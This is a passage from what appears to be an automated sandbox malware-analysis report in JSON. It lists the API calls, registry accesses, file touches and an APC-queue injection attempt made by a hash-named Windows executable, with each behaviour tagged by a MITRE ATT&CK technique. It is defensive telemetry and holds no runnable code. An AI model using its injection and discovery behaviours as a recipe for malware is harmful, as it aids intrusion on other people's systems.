\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter wcstombs (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter memset (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter _aulldiv (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter _aullrem (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter NtQueryVirtualMemory (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter SetEvent (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter HeapDestroy (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter HeapCreate (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter SwitchToThread (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter SetWaitableTimer (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter SleepEx (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter WaitForMultipleObjects (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter CreateWaitableTimerA (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter ResetEvent (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter lstrcmpW (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter EnterCriticalSection (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter LeaveCriticalSection (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSection (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter CreateFileMappingW (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter MapViewOfFile (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter ExpandEnvironmentStringsW (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter ExpandEnvironmentStringsA (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceFrequency (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter GetComputerNameW (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"GetProcAddress\" with a parameter GetComputerNameExA (UID: 00000000-00003088)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00003088)\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003088)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0f0010003a502200@ntdll.dll\"\n \"1200130000502200@ntdll.dll\"\n \"14001500f4502200@ntdll.dll\"\n \"1500160051502200@ntdll.dll\"\n \"0700080067502200@ntdll.dll\"\n \"15001600c03efe6b@ADVAPI32.dll\"\n \"0e000f00703ffe6b@ADVAPI32.dll\"\n \"0e000f00cc3ffe6b@ADVAPI32.dll\"\n \"11001200b447fe6b@ADVAPI32.dll\"\n \"110012004848fe6b@ADVAPI32.dll\"\n \"120013008c48fe6b@ADVAPI32.dll\"\n \"12001300e448fe6b@ADVAPI32.dll\"\n \"14001500dc6ffe6b@ADVAPI32.dll\"\n \"14001500f46ffe6b@ADVAPI32.dll\"\n \"140015000c70fe6b@ADVAPI32.dll\"\n \"170018002470fe6b@ADVAPI32.dll\"\n \"0d000e003c70fe6b@ADVAPI32.dll\"\n \"110012004c70fe6b@ADVAPI32.dll\"\n \"110012006070fe6b@ADVAPI32.dll\"\n \"0d000e003449fe6b@SHELL32.dll\"\n \"0d000e00b049fe6b@SHELL32.dll\"\n \"0f001000a071fe6b@ADVAPI32.dll\"\n \"14001500e071fe6b@ADVAPI32.dll\"\n \"14001500f871fe6b@ADVAPI32.dll\"\n \"0c000d004072fe6b@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76500000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94\" was detected as \"Microsoft visual C++ 8\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to access non-existent file \"C:\\DBGHELP.DLL\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to access non-existent file \"C:\\12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe.Local\\\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to access non-existent file \"C:\\12F1FA49CE2F2FD19DB6147E547A35625C260B2FEC2ECF67DE89C837990C5D94.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe.Local\\\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\\COMCTL32.dll\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" trying to touch file \"C:\\12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-85", "type": 6, "relevance": 3, "name": "Queues an Asynchronous Procedure Call (APC) in a remote process (injection)", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" called \"NtQueueApcThread\" (UID: 00000000-00003088)", "origin": "API Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"12f1fa49ce2f2fd19db6147e547a35625c260b2fec2ecf67de89c837990c5d94.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n 